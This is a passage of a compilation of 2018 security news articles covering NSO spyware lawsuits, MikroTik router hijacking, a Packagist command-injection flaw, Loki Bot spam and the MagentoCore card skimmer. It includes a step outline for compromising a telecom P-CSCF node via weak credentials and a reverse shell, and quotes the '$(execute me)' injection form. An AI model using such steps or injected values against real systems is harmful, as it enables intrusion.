Al-Athbah, who edits Qatar's Al-Arab newspaper, now has a new phone, a new SIM card and a new approach to email attachments and links. He says he never opens anything, "even from the most trusted circles in my life."

Al-Athbah's discovery touched off a process that has led, months later, to parallel lawsuits filed in Israel and Cyprus — and provided a behind-the-scenes look at how government-grade spyware is used to eavesdrop on everyone from Mexican reporters to Arab royalty.

The NSO Group did not immediately return messages seeking comment.

The first lawsuit , filed in a Tel Aviv court on Thursday, carries a claim from five Mexican journalists and activists who allege they were spied on using NSO Group software. The second, filed in Cyprus, adds Al-Athbah to the list of plaintiffs.

Both draw heavily on the leaked material handed to the editor several months ago. Portions of the material — which appears to have been carefully picked and exhaustively annotated by an unknown party — appear to show officials in the United Arab Emirates discussing whether to hack into the phones of senior figures in Saudi Arabia and Qatar, including members of the Qatari royal family.

Al-Athba declined to identify his source and the AP was not immediately able to verify the authenticity of the material, some of which has already been entered into evidence in the Israeli case, according to Mazen Masri, a member of Al-Athbah's legal team. But The New York Times, which first reported on the lawsuits earlier Friday, indicated that it had verified some of the cache, including a reference to an intercepted telephone conversation involving senior Arab journalist Abdulaziz Alkhamis. The Times said Alkhamis confirmed having had the conversation and said he was unaware that he was under surveillance.

The parallel lawsuits underline the growing notoriety of the NSO Group, which is owned by U.S. private equity firm Francisco Partners.

One of the Mexican plaintiffs, childhood anti-obesity campaigner Alejandro Calvillo, drew global attention last year when he was revealed to have been targeted using the Israeli company's spyware. The NSO Group's programs have since been implicated in a massive espionage scandal in Panama. A month ago, respected human rights organization Amnesty International accused the company of having crafted the digital tools used to target one of its staffers.

The five Mexican plaintiffs, who were advised by Mexico City-based digital activism group widely known by its acronym R3D, are seeking 2.5 million Israeli shekels ($693,000) in compensation and an injunction to prevent the NSO Group from helping anyone spy on them.

Al-Athbah said he wanted the case to go even further and spawn restrictions on the trade in hacking tools.

"I hope selling such technology should be stopped very soon," he said.


The Continuing Problem of Aligning Cybersecurity With Business
4.9.2018 securityweek  Cyber

Aligning security policy with business practices is generally considered to be a key imperative for a successful company. This must necessarily start with security teams understanding the business, and business leaders understanding security requirements.

Varonis decided to test the progress by querying 345 C-Suite executives and IT/cybersecurity professionals -- broadly separated into business and IT/security groups -- across the U.S., UK, France and Germany. The results show apparent progress, but with puzzling details that might indicate slightly divergent viewpoints between the two groups.

For example, asked what types of data most need to be protected, both groups agreed on first customer or patient data, and second, intellectual property. They disagreed however, on the third priority. The business group specified employee data, while the security group specified financial data.

However, the most surprising divergence comes in the response to a query on the business impact of a data breach. The security group were most concerned about loss of brand image for the business, while the business group were most concerned with the cost of recovery.

"If I had been asked before the survey," Brian Vecci, technical evangelist at Varonis, told SecurityWeek, "I would have thought that non-IT folks would have been more concerned about brand image and damage than with IT recovery costs -- but it's actually the other way around. It's the security experts that are most concerned with brand perception and intellectual property loss, whereas the non-IT C-suite execs -- the top business leaders -- tend to think that IT recovery costs are the biggest issues."

The figures suggest that business and IT/sec are still not fully aligned, but in a non-intuitive manner. The reason could be something simple. Business leaders understand business better than they understand cybersecurity, and consequently worry more about what they don't fully understand; while IT/sec people understand security better than they understand commerce.

Or it could be a continuing failure for IT/sec to find the best metrics for reporting to business leaders. "It's all about data," said Vecci. "Nobody ever breaks into a network to steal the network log -- it's all about data, either exfiltrating and stealing data, or in denying service with something like ransomware."

IT/sec is aware of the scale of the data issue, while business leaders are only just becoming aware. "We're living is a more dangerous interconnected world, where anybody, anywhere can -- and if they want to, probably will -- get into your network," continued Vecci. "And the scale of the problems they have to solve when it comes to data is far bigger than it used to be. Most companies have between 30% and 50% more data this year than they had last year, and it's not slowing down -- it's just the way things work."

The data that needs to be secured is also changing in its nature. A few years ago, most sensitive data was stored in structured databases, and the need and methodologies for securing that data were well understood. Now, however, the majority of sensitive data -- made more sensitive by increasingly stringent data privacy laws like the GDPR -- is held in unstructured files and documents. Earlier this year, the 2018 Varonis Global Data Risk Report showed that 41% of companies have more than 1,000 sensitive files open to everyone with access to the network, 58% of companies have more than 100,000 folders open to everyone.

IT and security teams need increasing budgets to solve the increasing problems -- so their reporting tends to reflect the problems. They, however, are less concerned because they can see the improvements to their security posture; and the Varonis figures confirm this. Ninety-one percent of the IT/sec group believe their organization is making progress in security, while only 69% of the business leaders see that progress.

"The arrival of machine learning technologies has helped CISOs believe they are moving the needle and improving security," suggests Vecci. "They can see this, while business execs, who tend to have a more binary view of things, possibly cannot see it."

The misalignment between IT/sec and business leaders may, then, be down to the difficulty of delivering meaningful metrics on the effect of machine learning defenses. This is possibly confirmed by one of the responses in the Varonis survey. Asked whether the organization can quantify the effect of cybersecurity measures, 88% of the IT/sec group replied in the affirmative, while only 68% of the business group agreed.

Unfortunately, while this may be partially true, other figures from the Varonis survey suggest that there remains a fundamental divide between the two sides. Ninety-six per cent of the IT/sec group believes their security planning approach is aligned with the organization's risks and objectives, but only 73% of the business leaders agree.

Perhaps the most concerning response came from the question on whether business is actually listening to IT/sec. Asked whether the leadership acts on input/guidance from the IT/sec team, 94% of the IT/sec team agreed, while only 76% of the business group agreed.

This Varonis survey shows that a fundamental misalignment still exists between business and IT/sec -- but not always in the most obvious manner. It could possibly be because business leaders still do not understand cybersecurity and simply turn a deaf ear to demands for more budget; or it could be the continuing inability of the IT/sec team to find the right metrics that can be understood by business people. This could in turn be down to the speed of technological changes. IT/sec is introducing new technologies like machine learning at a faster rate than they can provide metrics on the performance of those technologies.


Experts warn of 7,500+ MikroTik Routers that are hijacking owners’ traffic
4.9.2018 securityaffairs Hacking

The security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously
Earlier August, experts uncovered a massive crypto jacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.

The campaign started in Brazil, but it is rapidly expanded to other countries targeting MikroTik routers all over the world, over 200,000 devices were compromised.

Now experts from the security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously, allowing attackers to hijack the traffic of the hacked devices.

“What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.” reads the analysis published by Qihoo 360 Netlab.

“More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.”

According to the researchers, since Mid-July the hackers are exploiting the CVE-2018-14847 vulnerability in MikroTik routers to carry out the attacks.

The CVE-2018-14847 flaw was first revealed by WikiLeaks as part of the CIA Vault7 dump, the code for the exploitation of the issue was included in the hacking tool Chimay Red.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

Communication ports associated with the Winbox and Webfig are TCP/8291, TCP/80, and TCP/8080.

The researchers scanned the Internet for vulnerable devices, they found more than 5,000K devices with open TCP/8291 port, and 1,200k of them are Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.

Summarizing, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit because owners have not updated them.

Most of the vulnerable devices are located in Brazil, Russia, and Indonesia.

Mikrotik routers vulnerable

Netlab experts have detected a malware exploiting the CVE-2018-14847 vulnerability in the Mikrotik routers to perform a broad range of malicious activities, including traffic hijacking and CoinHive mining code injection.

The analysis shared by the experts includes the attack scenarios.

CoinHive Mining Code Injection
Once enabled the Mikrotik RouterOS HTTP proxy, the attackers hijack the HTTP proxy requests to a local HTTP 403 error page which injects a link for web mining code from Coinhive. Anyway the mining code used in this way cannot work because all the external web resources, including coinhive.com ones, are blocked by the proxy ACLs set by attackers themselves.”

Maliciously Enabling Sock4 Proxy
The attackers enabled the Socks4 port or TCP/4153 on victims device, in this way the attacker gain persistence on the router even after it has been rebooted (IP change) by periodically reporting its latest IP address to the attacker’s URL.

“a total of 239K IPs are confirmed to have Socks4 proxy enabled maliciously. The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 95.154.216.128/25.” states the report

“In order for the attacker to gain control even after device reboot(ip change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL.”

Experts pointed out that all the 239,000 IP addresses only allow access from 95.154.216.128/25, actually mainly from the 95.154.216.167 address.

Eavesdropping
The MikroTik RouterOS devices to capture packets on the router and forward them to the specified Stream server, this feature could be abused by attackers to forward the traffic to IP addresses controlled by them. Experts noticed that a significant number of devices have their traffic going to the 37.1.207.114 IP.

Don’t waste time, update the MikroTik devices and also check if the HTTP proxy, Socks4 proxy, and network traffic capture function are being abused by attackers.


Google paid million dollars to track offline purchases using Mastercard Data
4.9.2018 securityaffairs CyberCrime

Google has paid Mastercard millions of dollars to access offline transactions of its users, the news was revealed by Bloomberg.
New problems for Google, experts discovered a secret agreement of the tech giant with Mastercard to track user purchases offline.

Google has paid Mastercard millions of dollars to access offline transactions of its users.

The embarrassing agreement was revealed by Bloomberg that cited four unidentified people with knowledge of the deal.

Google used Mastercard data to track whether its ads led to a sale at a physical store in the U.S.

Google and Mastercard signed the agreement after a four-year negotiation, it gives the company all Mastercard transaction data in the US.

Neither Mastercard or Google have never disclosed the deal, roughly two billion Mastercard holders aren’t aware that Big G was tracking them.

“Alphabet Inc.’s Google and Mastercard Inc. brokered a business partnership during about four years of negotiations, according to four people with knowledge of the deal, three of whom worked on it directly.” reads the report published by Bloomberg.

“The alliance gave Google an unprecedented asset for measuring retail spending, part of the search giant’s strategy to fortify its primary business against onslaughts from Amazon.com Inc. and others.”

Google used the data to fuel a new tool for advertisers, called Store Sales Measurement, that is currently in a test phase for a restricted group of advertisers. The tool aims at tracking the conversion rate of online advertisements into real-world retail sales.

Google never revealed that the source of data used by its Store Sales Measurement service since its presentation, the company only declared that its customers had access to approximately 70% of U.S. credit and debit cards through partners.

“People don’t expect what they buy physically in a store to be linked to what they are buying online,” said Christine Bannan, counsel with the advocacy group Electronic Privacy Information Center (EPIC).

“There’s just far too much burden that companies place on consumers and not enough responsibility being taken by companies to inform users what they’re doing and what rights they have.”

This suggests that not just Mastercard, Google has deals with other credit card companies as well, which total of 70% of the people who use credit and debit cards in the United States.

However, it seems that users can reportedly opt out of offline ad tracking by merely turning off “Web and App Activity” in their Google account.

Mastercard denied that it has provided personal information to any third parties.

“Regarding the [Bloomberg] article you cited, I’d quickly note that the premise of what was reported is false. The way our network operates, we do not know the individual items that consumer purchases in any shopping cart—physical or digital.” a Mastercard spokesperson said in a statement:

“No individual transaction or personal data is provided. That delivers on the expectation of privacy from both consumers and merchants around the world. In processing a transaction, we see the retailer’s name and the total amount of the consumer’s purchase, but not specific items.”


Compromising Proxy Call Session Control Function (P-CSCF) using VoLTE
4.9.2018 securityaffairs Hacking

The IP Multimedia Subsystem (IMS) facilitates telecom operators in delivering multimedia applications and voice traffic over IP transport. Proxy Call Session Control Function (P-CSCF) is the first node in IMS Platform (figure 1) to interact with the User Equipment (UE) when initiating a VoLTE call. P-CSCF
figure 1 – Placement of Proxy Call Session Control Function in IMS Platform
Identify and Compromise Proxy Call Session Control Function with VoLTE phone:
1) Initiate a call with VoLTE phone and simultaneously open phone’s terminal to list currently established sessions. It was possible to identify the IP address of serving P-CSCF node, connected on port 5060 (figure 2).

P-CSCF
figure 2 – Identifying P-CSCF node connected on port 5060 (SIP protocol)
2) Management console of an application server and Proxy Call Session Control Function application (figure 3 & figure 4) were found by performing a service scan on identified IP address.

P-CSCF
figure 3 – P-CSCF applications’s management console
P-CSCF
figure 4 – Application server’s management console
3) Application server, Oracle Glassfish, was found to be weakly configured and could be accessed using weak credentials (figure 5).

P-CSCF
figure 5 – Access to Oracle Glassfish server using weak credentials
4) A reverse shell was triggered using a web shell and gained root access of the P-CSCF node (figure 6).

P-CSCF
figure 6 – Gained root access to P-CSCF (IMS)
After gaining access to the IMS platform, Attacker can compromise other core telecom components in the network.

To prevent such attacks, telecom operators should ensure traffic segregation between user plane, control plane, and management plane. It is highly recommended to patch all the core network elements with the latest security patches released by the vendor. Also, develop and implement minimum security guidelines before integrating nodes in the network.

Hope you enjoyed reading, suggestions are always welcome.

The original post is available at:
https://www.hardw00t.io/2018/09/compromising-p-cscf-using-volte.html


Parental control spyware app Family Orbit hacked, pictures of hundreds of monitored children were exposed
4.9.2018 securityaffairs Hacking

The company that sells the parental control spyware app Family Orbit has been hacked, pictures of hundreds of monitored children were left online.
The company that sells the parental control spyware app Family Orbit has been hacked, the pictures of hundreds of monitored children were left online only protected by a password.

According to Motherboard that first reported the news, the Family Orbit spyware left exposed nearly 281 GB of data online. The hacker discovered the huge trove of data that was stored on an unsecured server and reported the discovery to Motherboard. The hacker found the key on the cloud servers of the spyware app.

“A company that sells spyware to parents left the pictures of hundreds of monitored children online, only protected by a password that almost anyone could find, according to a hacker.” states Motherboard.

“The hacker, who’s mainly known for having hacked spyware maker Retina-X, wiping its servers (twice), said he was able to find the key to the cloud servers of Family Orbit, a company that that markets itself as “the best parental control app to protect your kids.” The servers contained the photos intercepted by the spyware, according to the hacker. The company confirmed the breach to Motherboard.”

Family Orbit spyware

Experts found a Rackspace with about 3,836 containers that also included video footages.

“I had all photos uploaded from the phones of kids being monitored, and also some screenshots of the developer’s desktops which exposed passwords and other secrets,” stated the unidentified hacker.

Motherboard also verified the data breach and stated that the data belonged to active users who used those email addresses to register to the service. Motherboard assessed 6 of the email addresses and concluded that the addresses were active.

The data was protected by an easy-to-guess password only. He found the key on the cloud servers of the spyware app.
The hacker who discovered the unprotected server is the same who hacked the server of another spyware, Retina-X, two times.

The company confirmed the data breach to Motherboard, its representative told Motherboard that the API key is stored encrypted in the app, and that the company observed “unusual bandwidth” used in their cloud storage.

“We have immediately changed our API key and login credentials. The sales and the services have been taken offline until we ensure all vulnerabilities are fixed,” the representative said via email.

The incident is not isolated, companies that sell spyware are a privileged target of hackers that protest against the abuse of technology for surveillance purposes.

In the last 18 months, other eight companies that sell spyware have been hacked, they are FlexiSpy, Retina-X, TheTruthSpy, Mobistealth, Spy Master Pro, Spyfone and SpyHuman.


Critical remote code execution flaw patched in Packagist PHP package repository
4.9.2018 securityaffairs
Vulnerebility

Maintainers of Packagist, the largest PHP package repository, have recently addressed a critical remote code execution vulnerability.
Packagist is the default package host behind Composer, it has over 435 million package installs.

The vulnerability was reported by the security researcher Max Justicz, the expert discovered that the “Submit Package” input field for submitting new PHP packages via the package repository homepage allowed an attacker to execute a malicious command in the format of “$(execute me)”.

“You could type $(execute me) into a big text field on the site and it would execute your command in a shell (twice).” reads the security advisory published by the expert.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,”

Packagist

The expert pointed out that when a user provided an URL to Packagist it was improperly escaping the input allowing ill-intentioned to execute any commands in a shell (twice).

The mitigation was simple, the maintainers of the Packagist repository simply implemented the escaping functionality for the relevant parameters in the Composer repository.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” explained Justicz.

The expert warned of the low level of security implemented for the Package manager that could open the doors to future attacks.

“Package manager security is not always great, and you should probably plan on your package manager servers being compromised in the future. In the past year or so I have found bugs that let me execute arbitrary code on rubygems.org, execute code on some of npm’s official mirrors (not the main registry), delete arbitrary release files from PyPI, serve arbitrary JS on every site using a popular CDN for npm, and now execute arbitrary code on packagist.org.” concludes the expert.

“I think it is a security anti-pattern to have application build pipelines pull fresh downloads of packages from upstream servers on every build if the packages are not expected to change. If for some reason you have to do this, you should pin dependencies using a cryptographically secure hash function.”


Kaspersky warns of a new Loki Bot campaign target corporate mailboxes
4.9.2018 securityaffairs BotNet

Security experts from Kaspersky Lab have uncovered a new spam campaign leveraging the Loki Bot malware to target corporate mailboxes.
The Loki Bot attacks started in July and aimed at stealing passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets

Loki Bot operators employ various social engineering technique to trick victims into opening weaponized attachments that would deploy the Loki Bot stealer.

The messages use attachments with .iso extensions, a type of file that worked as a container for delivering malware.

“Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot.” reads the analysis published by Kaspersky.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.”

The messages masquerade as notifications from other companies, or as orders and offers.

Threat actors are sending out copies of Loki Bot to company email addresses that were available on public sources or from the companies’ own websites.

Loki Bot

Experts observed different spam messages including fake notifications from well-known companies, fake notifications containing financial documents, and fake orders or offers.

Researchers highlighted the importance for organizations of adopting security measures that include both technical protections and training for employees.

“Every year we observe an increase in spam attacks on the corporate sector.” Kaspersky concludes.

“The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc.”


MagentoCore skimmer already infected 7,339 Magento stores
4.9.2018 securityaffairs Cryptocurrency

MagentoCore skimmer already infected 7,339 Magento stores, according to the Willem de Groot who uncovered the campaign, it is the most aggressive to date.
The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.

Threat actors behind this campaign managed to compromise the websites running Magento and injected the payment card scraper in its source code.

Crooks attempts to access the control panel of Magento stores with brute force attacks.

At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.

The malicious script loads on store checkout pages and steals payment card details provided by the users and send it to a server controlled by the attacker.
Willem de Groot reported that the hacking campaign is involving a skimmer script loaded from the magentocore.net domain.

“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.

MagentoCore credit card stealer Reinfector

The expert found the MagentoCore script on 7,339 Magento stores in the past six months, the campaign is still ongoing and hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.

“The average recovery time is a few weeks, but at least 1450 stor